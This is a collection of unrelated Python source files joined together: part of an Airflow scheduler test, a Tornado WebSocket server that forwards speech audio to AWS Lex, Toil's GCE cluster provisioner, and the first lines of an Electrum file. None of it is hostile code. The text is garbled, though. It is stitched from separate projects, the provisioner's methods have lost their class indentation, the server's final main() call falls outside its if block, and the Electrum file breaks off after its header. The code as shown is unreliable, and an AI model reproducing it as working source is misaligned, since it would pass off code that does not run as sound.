    dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    # Dagrun finished (SUCCESS): its SCHEDULED task must be left alone.
    dr1.state = State.SUCCESS
    tis = dr1.get_task_instances(session=session)
    self.assertEqual(1, len(tis))
    tis[0].state = State.SCHEDULED
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()

    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
    """Create dagruns and ensure only ones with correct states are reset."""
    prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
    states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
    states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]

    dag = DAG(dag_id=prefix,
              start_date=DEFAULT_DATE,
              schedule_interval="@daily")
    tasks = []
    # One task per state under test.
    for i in range(len(states)):
        task_id = "{}_task_{}".format(prefix, i)
        task = DummyOperator(task_id=task_id, dag=dag)
        tasks.append(task)

    scheduler = SchedulerJob()

    session = settings.Session()

    # create dagruns: dr1 running (eligible for reset), dr2 finished (not).
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    dr2.state = State.SUCCESS
    session.merge(dr1)
    session.merge(dr2)
    session.commit()

    # create taskinstances and set states
    dr1_tis = []
    dr2_tis = []
    for i, (task, state) in enumerate(zip(tasks, states)):
        ti1 = TI(task, dr1.execution_date)
        ti2 = TI(task, dr2.execution_date)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = state
        ti2.state = state
        dr1_tis.append(ti1)
        dr2_tis.append(ti2)
        session.merge(ti1)
        session.merge(ti2)
        session.commit()

    # NOTE(review): only QUEUED and SCHEDULED survive the merge as
    # resettable here, giving 2 rather than 3 — presumably State.NONE does
    # not round-trip; confirm against reset_state_for_orphaned_tasks.
    self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))

    for ti in dr1_tis + dr2_tis:
        ti.refresh_from_db()

    # running dagrun should be reset
    for state, ti in zip(states, dr1_tis):
        if state in states_to_reset:
            self.assertIsNone(ti.state)
        else:
            self.assertEqual(state, ti.state)

    # otherwise not
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)

    for state, ti in zip(states, dr1_tis):
        ti.state = state
    session.commit()

    scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)

    # check same for dag_run version
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)

    session.close()
|
server.py | #!/usr/bin/env python
from __future__ import absolute_import, print_function
import argparse
import ConfigParser as configparser
import io
import logging
import os
import sys
import time
from ConfigParser import SafeConfigParser as ConfigParser
from logging import debug, info
import uuid
import requests
import tornado.ioloop
import tornado.websocket
import tornado.httpserver
import tornado.template
import tornado.web
import webrtcvad
from requests_aws4auth import AWS4Auth
from tornado.web import url
import json
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
from requests.packages.urllib3.exceptions import SNIMissingWarning
#Only used for record function
import datetime
import wave
import threading
# Route warnings through logging and silence noisy urllib3 warnings that
# fire on older Python 2 SSL stacks.
logging.captureWarnings(True)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)

# Audio framing parameters (16 kHz, 16-bit mono PCM — 640 bytes per 20 ms).
CLIP_MIN_MS = 100  # 100ms - the minimum audio clip that will be used
MAX_LENGTH = 10000  # Max length of a sound clip for processing in ms
SILENCE = 20  # How many continuous frames of silence determine the end of a phrase

# Constants:
BYTES_PER_FRAME = 640  # Bytes in a frame
MS_PER_FRAME = 20  # Duration of a frame in ms

CLIP_MIN_FRAMES = CLIP_MIN_MS // MS_PER_FRAME

# Global variables
conns = {}  # live WebSocket connections, keyed by WSHandler.id

# Baseline config layered under ./lexmo.conf; only declares the section.
DEFAULT_CONFIG = """
[lexmo]
"""
class BufferedPipe(object):
    """Accumulates audio frames and hands them to a sink on a worker thread."""

    def __init__(self, max_frames, sink):
        """
        Create a buffer which will call the provided `sink` when full.

        It will call `sink` with the number of frames and the accumulated
        bytes when it reaches `max_frames` frames.

        :param max_frames: frame count that triggers automatic processing
        :param sink: callable ``sink(count, payload, id)``
        """
        self.sink = sink
        self.max_frames = max_frames
        self.count = 0
        self.payload = b''
        self.is_processing = False

    def append(self, data, id):
        """ Add another data to the buffer. `data` should be a `bytes` object. """
        # Drop frames while a previous buffer is still being processed.
        if self.is_processing:
            return
        self.count += 1
        self.payload += data
        if self.count == self.max_frames:
            self.process(id)

    def process(self, id):
        """ Process and clear the buffer on a background daemon thread. """
        if self.is_processing:
            return
        self.is_processing = True
        # Fix: pass the callable and its argument separately instead of the
        # original call-then-pass closure (`target=self.process_thread(id)`),
        # which invoked process_thread in the caller's thread just to build
        # the worker function — error-prone and needlessly indirect.
        thread = threading.Thread(target=self.process_thread, args=(id,))
        thread.daemon = True
        thread.start()

    def process_thread(self, id):
        """Deliver the buffered payload to the sink, then reset the buffer.

        Runs on the worker thread started by `process`.
        """
        self.sink(self.count, self.payload, id)
        self.count = 0
        self.payload = b''
        self.is_processing = False
class LexProcessor(object):
    """Sends buffered audio to AWS Lex and plays the PCM reply back over the
    originating WebSocket connection."""

    def __init__(self, path, aws_id, aws_secret):
        # `path` is the request URI, used verbatim as the Lex runtime path.
        self._aws_region = 'us-east-1'
        self._aws_id = aws_id
        self._aws_secret = aws_secret
        self._path = path

    def process(self, count, payload, id):
        """Forward `payload` (count frames of PCM) to Lex for connection `id`.

        Used as the sink of a BufferedPipe; clips shorter than
        CLIP_MIN_FRAMES are discarded.
        """
        if count > CLIP_MIN_FRAMES:  # If the buffer is less than CLIP_MIN_MS, ignore it
            if logging.getLogger().level == 10:  # if we're in Debug then save the audio clip
                fn = "{}rec-{}-{}.wav".format('./recordings/', id, datetime.datetime.now().strftime("%Y%m%dT%H%M%S"))
                output = wave.open(fn, 'wb')
                # 1 channel, 2 bytes/sample, 16 kHz.
                output.setparams((1, 2, 16000, 0, 'NONE', 'not compressed'))
                output.writeframes(payload)
                output.close()
                debug('File written {}'.format(fn))
            # NOTE(review): unsign_payload presumably makes AWS4Auth sign with
            # UNSIGNED-PAYLOAD so the body hash is skipped — confirm against
            # the requests_aws4auth documentation.
            auth = AWS4Auth(self._aws_id, self._aws_secret, 'us-east-1', 'lex', unsign_payload=True)
            info('Processing {} frames for {}'.format(str(count), id))
            endpoint = 'https://runtime.lex.{}.amazonaws.com{}'.format(self._aws_region, self._path)
            headers = {'Content-Type': 'audio/l16; channels=1; rate=16000', 'Accept': 'audio/pcm'}
            # Prepare once to obtain the signed headers, then POST the audio.
            req = requests.Request('POST', endpoint, auth=auth, headers=headers)
            prepped = req.prepare()
            info(prepped.headers)
            r = requests.post(endpoint, data=payload, headers=prepped.headers)
            info(r.headers)
            self.playback(r.content, id)
        else:
            info('Discarding {} frames'.format(str(count)))

    def playback(self, content, id):
        """Stream Lex's PCM response to connection `id` in 640-byte frames,
        pacing writes at roughly real time (~20 ms per frame)."""
        frames = len(content) // 640
        info("Playing {} frames to {}".format(frames, id))
        conn = conns[id]
        pos = 0
        # frames + 1 iterations so any trailing partial frame is flushed too.
        for x in range(0, frames + 1):
            newpos = pos + 640
            # debug("writing bytes {} to {} to socket for {}".format(pos, newpos, id))
            data = content[pos:newpos]
            conn.write_message(data, binary=True)
            time.sleep(0.018)
            pos = newpos
        time.sleep(0.5)
class WSHandler(tornado.websocket.WebSocketHandler):
    """WebSocket endpoint: runs VAD over incoming audio frames and pipes
    speech segments to a LexProcessor."""

    def initialize(self):
        # Create a buffer which will call `process` when it is full:
        self.frame_buffer = None
        # Setup the Voice Activity Detector
        self.tick = None
        self.id = uuid.uuid4().hex
        self.vad = webrtcvad.Vad()
        self.vad.set_mode(2)  # Level of sensitivity
        self.processor = None
        self.path = None
        # Register the connection globally so LexProcessor.playback can find it.
        conns[self.id] = self

    def open(self, path):
        info("client connected")
        debug(self.request.uri)
        self.path = self.request.uri
        self.tick = 0
        self.set_nodelay(True)

    def on_message(self, message):
        # Check if message is Binary or Text
        # NOTE(review): this relies on Python 2 tornado semantics where a
        # binary frame arrives as `str` and a text frame as `unicode`;
        # under Python 3 both branches would misfire — confirm runtime.
        if type(message) == str:
            if self.vad.is_speech(message, 16000):
                debug("SPEECH from {}".format(self.id))
                # Reset the silence countdown on every speech frame.
                self.tick = SILENCE
                self.frame_buffer.append(message, self.id)
            else:
                debug("Silence from {} TICK: {}".format(self.id, self.tick))
                self.tick -= 1
                if self.tick == 0:
                    self.frame_buffer.process(self.id)  # Force processing and clearing of the buffer
        else:
            info(message)
            # Here we should be extracting the meta data that was sent and attaching it to the connection object
            data = json.loads(message)
            # First text message carries AWS credentials; build the pipeline.
            self.processor = LexProcessor(self.path, data['aws_key'], data['aws_secret']).process
            self.frame_buffer = BufferedPipe(MAX_LENGTH // MS_PER_FRAME, self.processor)
            self.write_message('ok')

    def on_close(self):
        # Remove the connection from the list of connections
        del conns[self.id]
        info("client disconnected")
class PingHandler(tornado.web.RequestHandler):
    """Plain-text health-check endpoint: GET /ping -> 'ok'."""

    @tornado.web.asynchronous
    def get(self):
        self.write('ok')
        self.set_header("Content-Type", 'text/plain')
        self.finish()
class Config(object):
    """Resolve host/port settings: environment variables override the
    config file, which is layered over DEFAULT_CONFIG."""

    def __init__(self, specified_config_path):
        """
        Load settings from `specified_config_path`, falling back to
        ./lexmo.conf when it is None. Exits the process with a message on
        stderr if a required setting is missing or malformed.
        """
        config = ConfigParser()
        config.readfp(io.BytesIO(DEFAULT_CONFIG))
        # Bug fix: the path given on the command line (-c/--config) was
        # previously ignored and ./lexmo.conf was always read. Honour it,
        # keeping the old behaviour when no path is supplied.
        config.read(specified_config_path or "./lexmo.conf")
        # Validate config:
        try:
            self.host = os.getenv('HOST') or config.get("lexmo", "host")
            self.port = os.getenv('PORT') or config.getint("lexmo", "port")
        except configparser.Error as e:
            print("Configuration Error:", e, file=sys.stderr)
            sys.exit(1)
def main(argv=sys.argv[1:]):
    """Parse arguments, configure logging and run the WebSocket server.

    :param argv: argument list (snapshot of sys.argv[1:] taken at import).
    """
    try:
        ap = argparse.ArgumentParser()
        # Bug fix: default=0 so `args.verbose < 1` is well-defined when -v
        # is absent (argparse's count action defaults to None, which makes
        # the comparison raise TypeError on Python 3).
        ap.add_argument("-v", "--verbose", action="count", default=0)
        ap.add_argument("-c", "--config", default=None)
        args = ap.parse_args(argv)

        logging.basicConfig(
            level=logging.INFO if args.verbose < 1 else logging.DEBUG,
            format="%(levelname)7s %(message)s",
        )
        config = Config(args.config)

        application = tornado.web.Application([
            url(r"/ping", PingHandler),
            url(r"/(.*)", WSHandler),
        ])

        http_server = tornado.httpserver.HTTPServer(application)
        http_server.listen(config.port)
        info("Running on port %s", config.port)
        tornado.ioloop.IOLoop.instance().start()
    except KeyboardInterrupt:
        pass  # Suppress the stack-trace on quit
if __name__ == "__main__":
main()
|
gceProvisioner.py | # Copyright (C) 2015 UCSC Computational Genomics Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import range
import os
import time
import threading
import json
import requests
import uuid
import logging
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.compute.drivers.gce import GCEFailedNode
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners import NoSuchClusterException
from toil.jobStores.googleJobStore import GoogleJobStore
from toil.provisioners.node import Node
logger = logging.getLogger(__name__)
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
class GCEProvisioner(AbstractProvisioner):
"""
Implements a Google Compute Engine Provisioner using libcloud.
"""
NODE_BOTO_PATH = "/root/.boto" # boto file path on instances
SOURCE_IMAGE = (b'projects/flatcar-cloud/global/images/family/flatcar-stable')
def __init__(self, clusterName, zone, nodeStorage, nodeStorageOverrides, sseKey):
    """
    :param clusterName: name of the cluster, or None/empty when running on
        the leader itself (settings are then read from instance metadata).
    :param zone: GCE zone to operate in.
    :param nodeStorage: default per-node disk size (GB).
    :param nodeStorageOverrides: per-nodeType disk size overrides.
    :param sseKey: optional server-side-encryption key path to copy to workers.
    """
    super(GCEProvisioner, self).__init__(clusterName, zone, nodeStorage, nodeStorageOverrides)
    self.cloud = 'gce'
    self._sseKey = sseKey

    # If the clusterName is not given, then Toil must be running on the leader
    # and should read the settings from the instance meta-data.
    if clusterName:
        self._readCredentials()
    else:
        self._readClusterSettings()
def _readClusterSettings(self):
    """
    Read the cluster settings from the instance, which should be the leader.
    See https://cloud.google.com/compute/docs/storing-retrieving-metadata for details about
    reading the metadata.
    """
    metadata_server = "http://metadata/computeMetadata/v1/instance/"
    metadata_flavor = {'Metadata-Flavor': 'Google'}
    # Zone is returned as "projects/<num>/zones/<zone>"; keep the last part.
    zone = requests.get(metadata_server + 'zone', headers=metadata_flavor).text
    self._zone = zone.split('/')[-1]

    project_metadata_server = "http://metadata/computeMetadata/v1/project/"
    self._projectId = requests.get(project_metadata_server + 'project-id', headers=metadata_flavor).text

    # From a GCE instance, these values can be blank. Only the projectId is needed
    self._googleJson = ''
    self._clientEmail = ''

    # The instance description holds the JSON tag blob written at launch
    # (see launchCluster), including the cluster name.
    self._tags = requests.get(metadata_server + 'description', headers=metadata_flavor).text
    tags = json.loads(self._tags)
    self.clusterName = tags['clusterName']
    self._gceDriver = self._getDriver()
    self._instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)

    leader = self.getLeader()
    self._leaderPrivateIP = leader.privateIP

    # generate a public key for the leader, which is used to talk to workers
    self._masterPublicKey = self._setSSH()

    # The location of the Google credentials file on instances.
    self._credentialsPath = GoogleJobStore.nodeServiceAccountJson
    self._keyName = 'core'  # key name leader users to communicate with works
    self._botoPath = self.NODE_BOTO_PATH  # boto credentials (used if reading an AWS bucket)
def _readCredentials(self):
    """
    Get the credentials from the file specified by GOOGLE_APPLICATION_CREDENTIALS.

    Caches the project id, client email and credentials path, then creates
    the libcloud GCE driver.

    :raises RuntimeError: if the environment variable is unset, or the file
        cannot be read or parsed as JSON.
    """
    self._googleJson = os.getenv('GOOGLE_APPLICATION_CREDENTIALS')
    if not self._googleJson:
        raise RuntimeError('GOOGLE_APPLICATION_CREDENTIALS not set.')
    try:
        with open(self._googleJson) as jsonFile:
            self.googleConnectionParams = json.loads(jsonFile.read())
    except (EnvironmentError, ValueError):
        # Narrowed from a bare `except:`, which also caught SystemExit and
        # KeyboardInterrupt. EnvironmentError covers I/O failures;
        # ValueError covers malformed JSON.
        raise RuntimeError('GCEProvisioner: Could not parse the Google service account json file %s'
                           % self._googleJson)

    self._projectId = self.googleConnectionParams['project_id']
    self._clientEmail = self.googleConnectionParams['client_email']
    self._credentialsPath = self._googleJson
    self._masterPublicKey = None
    self._gceDriver = self._getDriver()
def launchCluster(self, leaderNodeType, leaderStorage, owner, **kwargs):
    """
    In addition to the parameters inherited from the abstractProvisioner,
    the Google launchCluster takes the following parameters:
    keyName: The key used to communicate with instances
    botoPath: Boto credentials for reading an AWS jobStore (optional).
    vpcSubnet: A subnet (optional).
    """
    if 'keyName' not in kwargs:
        raise RuntimeError("A keyPairName is required for the GCE provisioner.")
    self._keyName = kwargs['keyName']
    if 'botoPath' in kwargs:
        self._botoPath = kwargs['botoPath']
    self._vpcSubnet = kwargs['vpcSubnet'] if 'vpcSubnet' in kwargs else None

    # Throws an error if cluster exists
    self._instanceGroup = self._gceDriver.ex_create_instancegroup(self.clusterName, self._zone)
    logger.debug('Launching leader')

    # GCE doesn't have a dictionary tags field. The tags field is just a string list.
    # Therefore, dumping tags into the description.
    tags = {'Owner': self._keyName, 'clusterName': self.clusterName}
    if 'userTags' in kwargs:
        tags.update(kwargs['userTags'])
    self._tags = json.dumps(tags)

    # cloud-config user data boots the instance as a Toil leader appliance.
    userData = self._getCloudConfigUserData('leader')
    metadata = {'items': [{'key': 'user-data', 'value': userData}]}
    imageType = 'flatcar-stable'
    sa_scopes = [{'scopes': ['compute', 'storage-full']}]
    # Boot disk built from the Flatcar source image, deleted with the node.
    disk = {}
    disk['initializeParams'] = {
        'sourceImage': self.SOURCE_IMAGE,
        'diskSizeGb': leaderStorage}
    disk.update({'boot': True,
                 'autoDelete': True})
    name = 'l' + str(uuid.uuid4())
    leader = self._gceDriver.create_node(name, leaderNodeType, imageType,
                                         location=self._zone,
                                         ex_service_accounts=sa_scopes,
                                         ex_metadata=metadata,
                                         ex_subnetwork=self._vpcSubnet,
                                         ex_disks_gce_struct=[disk],
                                         description=self._tags,
                                         ex_preemptible=False)

    self._instanceGroup.add_instances([leader])
    self._leaderPrivateIP = leader.private_ips[0]  # needed if adding workers
    # self.subnetID = leader.subnet_id  # TODO: get subnetID

    # Wait for the appliance to start and inject credentials.
    leaderNode = Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
                      name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
                      preemptable=False, tags=self._tags)
    leaderNode.waitForNode('toil_leader', keyName=self._keyName)
    leaderNode.copySshKeys(self._keyName)
    leaderNode.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_leader')
    if self._botoPath:
        leaderNode.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_leader')

    logger.debug('Launched leader')
def getNodeShape(self, nodeType, preemptable=False):
    """Return the resource Shape (wallTime, memory, cores, disk) for the
    given GCE machine type name."""
    # TODO: read this value only once
    sizes = self._gceDriver.list_sizes(location=self._zone)
    sizes = [x for x in sizes if x.name == nodeType]
    assert len(sizes) == 1
    instanceType = sizes[0]

    disk = 0  # instanceType.disks * instanceType.disk_capacity * 2 ** 30
    if disk == 0:
        # This is an EBS-backed instance. We will use the root
        # volume, so add the amount of EBS storage requested for the root volume
        disk = self._nodeStorageOverrides.get(nodeType, self._nodeStorage) * 2 ** 30

    # Ram is in M.
    # Underestimate memory by 100M to prevent autoscaler from disagreeing with
    # mesos about whether a job can run on a particular node type
    memory = (instanceType.ram / 1000 - 0.1) * 2 ** 30
    return Shape(wallTime=60 * 60,
                 memory=memory,
                 cores=instanceType.extra['guestCpus'],
                 disk=disk,
                 preemptable=preemptable)
@staticmethod
def retryPredicate(e):
    """GCE performs no error-driven retries; always decline. Not used by GCE."""
    return False
def destroyCluster(self):
    """
    Try a few times to terminate all of the instances in the group.
    """
    logger.debug("Destroying cluster %s" % self.clusterName)
    instancesToTerminate = self._getNodesInCluster()
    attempts = 0
    # Re-list after each pass; some terminations may fail transiently,
    # so retry up to 3 times until the cluster reports empty.
    while instancesToTerminate and attempts < 3:
        self._terminateInstances(instances=instancesToTerminate)
        instancesToTerminate = self._getNodesInCluster()
        attempts += 1

    # remove group
    instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
    instanceGroup.destroy()
def terminateNodes(self, nodes):
    """Terminate the cluster instances that correspond to *nodes*.

    :param nodes: iterable of Node objects whose instances should be killed.
    """
    # Use a set for O(1) membership tests instead of scanning a list for
    # every instance (was O(len(nodes)) per instance).
    nodeNames = {n.name for n in nodes}
    instances = self._getNodesInCluster()
    instancesToKill = [i for i in instances if i.name in nodeNames]
    self._terminateInstances(instancesToKill)
def addNodes(self, nodeType, numNodes, preemptable, spotBid=None):
    """Launch worker instances of the given type and attach them to the
    cluster's instance group.

    :param nodeType: GCE machine size name for the new workers.
    :param numNodes: number of workers requested.
    :param preemptable: whether to request preemptible instances.
    :param spotBid: unused on GCE (kept for AWS interface compatibility).
    :return: the number of workers actually created and configured.
    """
    assert self._leaderPrivateIP
    # If keys are rsynced, then the mesos-slave needs to be started after the keys have been
    # transferred. The waitForKey.sh script loops on the new VM until it finds the keyPath file, then it starts the
    # mesos-slave. If there are multiple keys to be transferred, then the last one to be transferred must be
    # set to keyPath.
    keyPath = None
    botoExists = False
    if self._botoPath is not None and os.path.exists(self._botoPath):
        keyPath = self.NODE_BOTO_PATH
        botoExists = True
    elif self._sseKey:
        keyPath = self._sseKey

    if not preemptable:
        logger.debug('Launching %s non-preemptable nodes', numNodes)
    else:
        logger.debug('Launching %s preemptable nodes', numNodes)

    #kwargs["subnet_id"] = self.subnetID if self.subnetID else self._getClusterInstance(self.instanceMetaData).subnet_id
    userData = self._getCloudConfigUserData('worker', self._masterPublicKey, keyPath, preemptable)
    metadata = {'items': [{'key': 'user-data', 'value': userData}]}
    imageType = 'flatcar-stable'
    sa_scopes = [{'scopes': ['compute', 'storage-full']}]
    disk = {}
    disk['initializeParams'] = {
        'sourceImage': self.SOURCE_IMAGE,
        'diskSizeGb' : self._nodeStorageOverrides.get(nodeType, self._nodeStorage) }
    disk.update({'boot': True,
                 'autoDelete': True })

    # TODO:
    #  - bug in gce.py for ex_create_multiple_nodes (erroneously, doesn't allow image and disk to specified)
    #  - ex_create_multiple_nodes is limited to 1000 nodes
    #    - use a different function
    #    - or write a loop over the rest of this function, with 1K nodes max on each iteration
    #instancesLaunched = driver.ex_create_multiple_nodes(
    retries = 0
    workersCreated = 0
    # Try a few times to create the requested number of workers
    while numNodes-workersCreated > 0 and retries < 3:
        instancesLaunched = self.ex_create_multiple_nodes(
            '', nodeType, imageType, numNodes-workersCreated,
            location=self._zone,
            ex_service_accounts=sa_scopes,
            ex_metadata=metadata,
            ex_disks_gce_struct = [disk],
            description=self._tags,
            ex_preemptible = preemptable
        )
        failedWorkers = []
        for instance in instancesLaunched:
            if isinstance(instance, GCEFailedNode):
                logger.error("Worker failed to launch with code %s. Error message: %s"
                             % (instance.code, instance.error))
                continue

            node = Node(publicIP=instance.public_ips[0], privateIP=instance.private_ips[0],
                        name=instance.name, launchTime=instance.created_at, nodeType=instance.size,
                        preemptable=False, tags=self._tags)  #FIXME: what should tags be set to?
            # NOTE(review): preemptable=False is hard-coded here even though a
            # preemptable flag was requested — looks suspicious; confirm whether
            # Node.preemptable is used downstream before changing it.
            try:
                self._injectWorkerFiles(node, botoExists)
                logger.debug("Created worker %s" % node.publicIP)
                self._instanceGroup.add_instances([instance])
                workersCreated += 1
            except Exception as e:
                logger.error("Failed to configure worker %s. Error message: %s" % (node.name, e))
                failedWorkers.append(instance)
        if failedWorkers:
            logger.error("Terminating %d failed workers" % len(failedWorkers))
            self._terminateInstances(failedWorkers)
        retries += 1

    # Log the number actually created (was: numNodes, which over-reported
    # whenever some workers failed to come up or configure).
    logger.debug('Launched %d new instance(s)', workersCreated)
    if numNodes != workersCreated:
        logger.error("Failed to launch %d worker(s)", numNodes-workersCreated)
    return workersCreated
def getProvisionedWorkers(self, nodeType, preemptable):
    """Return the running worker Nodes of the given type and preemptability.

    The leader (identified by its private IP) is excluded from the result.
    """
    assert self._leaderPrivateIP
    entireCluster = self._getNodesInCluster(nodeType=nodeType)
    logger.debug('All nodes in cluster: %s', entireCluster)
    workerInstances = []
    for candidate in entireCluster:
        sched = candidate.extra.get('scheduling')
        # Without 'scheduling' metadata, assume the node is not preemptible.
        if sched and sched.get('preemptible', False) != preemptable:
            continue
        if self._leaderPrivateIP in candidate.private_ips:
            continue  # don't include the leader
        if candidate.state == 'running':
            workerInstances.append(candidate)
    logger.debug('All workers found in cluster: %s', workerInstances)
    return [Node(publicIP=i.public_ips[0], privateIP=i.private_ips[0],
                 name=i.name, launchTime=i.created_at, nodeType=i.size,
                 preemptable=preemptable, tags=None)
            for i in workerInstances]
def getLeader(self):
    """Return the cluster leader as a Node.

    Assumes the leader was the first instance launched (oldest created_at).

    :raises NoSuchClusterException: if the cluster has no instances.
    """
    ordered = sorted(self._getNodesInCluster(), key=lambda inst: inst.created_at)
    if not ordered:
        raise NoSuchClusterException(self.clusterName)
    leader = ordered[0]  # assume leader was launched first
    return Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
                name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
                preemptable=False, tags=None)
def _injectWorkerFiles(self, node, botoExists):
    """
    Set up the credentials on the worker.

    Waits for the node's 'toil_worker' container to come up, copies the ssh
    keys, and injects the Google service-account JSON plus, when configured,
    the SSE key and the .boto file.

    :param node: the freshly launched worker Node.
    :param botoExists: whether a local .boto file exists and must be injected.
    """
    node.waitForNode('toil_worker', keyName=self._keyName)
    node.copySshKeys(self._keyName)
    node.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_worker')
    if self._sseKey:
        node.injectFile(self._sseKey, self._sseKey, 'toil_worker')
    if botoExists:
        node.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_worker')
def _getNodesInCluster(self, nodeType=None):
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instances = instanceGroup.list_instances()
if nodeType:
instances = [instance for instance in instances if instance.size == nodeType]
return instances
def _getDriver(self):
    """ Connect to GCE """
    # libcloud GCE driver, authenticated with the service-account email and
    # JSON key file, scoped to this project and zone.
    driverCls = get_driver(Provider.GCE)
    return driverCls(self._clientEmail,
                     self._googleJson,
                     project=self._projectId,
                     datacenter=self._zone)
def _terminateInstances(self, instances):
    """Destroy the given instances in parallel, one thread each, and wait
    for all destroy calls to return."""
    def _destroy(driver, inst):
        logger.debug('Terminating instance: %s', inst.name)
        driver.destroy_node(inst)

    workers = [threading.Thread(target=_destroy, args=(self._gceDriver, inst))
               for inst in instances]
    for w in workers:
        w.start()
    logger.debug('... Waiting for instance(s) to shut down...')
    for w in workers:
        w.join()
# MONKEY PATCH - This function was copied from libcloud to fix a bug.
# Upper bound, in seconds, that ex_create_multiple_nodes polls for all
# requested nodes to finish creating before raising.
DEFAULT_TASK_COMPLETION_TIMEOUT = 180
def ex_create_multiple_nodes(
        self, base_name, size, image, number, location=None,
        ex_network='default', ex_subnetwork=None, ex_tags=None,
        ex_metadata=None, ignore_errors=True, use_existing_disk=True,
        poll_interval=2, external_ip='ephemeral',
        ex_disk_type='pd-standard', ex_disk_auto_delete=True,
        ex_service_accounts=None, timeout=DEFAULT_TASK_COMPLETION_TIMEOUT,
        description=None, ex_can_ip_forward=None, ex_disks_gce_struct=None,
        ex_nic_gce_struct=None, ex_on_host_maintenance=None,
        ex_automatic_restart=None, ex_image_family=None,
        ex_preemptible=None):
    """
    Monkey patch to gce.py in libcloud to allow disk and images to be specified.
    Also changed name to a uuid below.
    The prefix 'wp' identifies preemptable nodes and 'wn' non-preemptable nodes.

    Creates *number* nodes asynchronously and polls until all are created
    (or failed), raising after *timeout* seconds.

    :return: list of created nodes (may contain failure placeholders when
        ignore_errors is True).
    """
    # if image and ex_disks_gce_struct:
    #    raise ValueError("Cannot specify both 'image' and "
    #                     "'ex_disks_gce_struct'.")
    driver = self._getDriver()
    if image and ex_image_family:
        raise ValueError("Cannot specify both 'image' and "
                         "'ex_image_family'")
    location = location or driver.zone
    # Resolve string identifiers to libcloud resource objects as needed.
    if not hasattr(location, 'name'):
        location = driver.ex_get_zone(location)
    if not hasattr(size, 'name'):
        size = driver.ex_get_size(size, location)
    if not hasattr(ex_network, 'name'):
        ex_network = driver.ex_get_network(ex_network)
    if ex_subnetwork and not hasattr(ex_subnetwork, 'name'):
        ex_subnetwork = \
            driver.ex_get_subnetwork(ex_subnetwork,
                                     region=driver._get_region_from_zone(
                                         location))
    if ex_image_family:
        image = driver.ex_get_image_from_family(ex_image_family)
    if image and not hasattr(image, 'name'):
        image = driver.ex_get_image(image)
    if not hasattr(ex_disk_type, 'name'):
        ex_disk_type = driver.ex_get_disktype(ex_disk_type, zone=location)

    node_attrs = {'size': size,
                  'image': image,
                  'location': location,
                  'network': ex_network,
                  'subnetwork': ex_subnetwork,
                  'tags': ex_tags,
                  'metadata': ex_metadata,
                  'ignore_errors': ignore_errors,
                  'use_existing_disk': use_existing_disk,
                  'external_ip': external_ip,
                  'ex_disk_type': ex_disk_type,
                  'ex_disk_auto_delete': ex_disk_auto_delete,
                  'ex_service_accounts': ex_service_accounts,
                  'description': description,
                  'ex_can_ip_forward': ex_can_ip_forward,
                  'ex_disks_gce_struct': ex_disks_gce_struct,
                  'ex_nic_gce_struct': ex_nic_gce_struct,
                  'ex_on_host_maintenance': ex_on_host_maintenance,
                  'ex_automatic_restart': ex_automatic_restart,
                  'ex_preemptible': ex_preemptible}

    # List for holding the status information for disk/node creation.
    status_list = []
    for i in range(number):
        name = 'wp' if ex_preemptible else 'wn'
        name += str(uuid.uuid4())  #'%s-%03d' % (base_name, i)
        status = {'name': name, 'node_response': None, 'node': None}
        status_list.append(status)

    start_time = time.time()
    complete = False
    while not complete:
        if (time.time() - start_time >= timeout):
            # Was: "... (%s sec) ..." with no % argument, so the literal
            # placeholder appeared in the message instead of the timeout.
            raise Exception("Timeout (%s sec) while waiting for multiple "
                            "instances" % timeout)
        complete = True
        time.sleep(poll_interval)
        for status in status_list:
            # Create the node or check status if already in progress.
            if not status['node']:
                if not status['node_response']:
                    driver._multi_create_node(status, node_attrs)
                else:
                    driver._multi_check_node(status, node_attrs)
            # If any of the nodes have not been created (or failed) we are
            # not done yet.
            if not status['node']:
                complete = False

    # Return list of nodes
    node_list = []
    for status in status_list:
        node_list.append(status['node'])
    return node_list
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
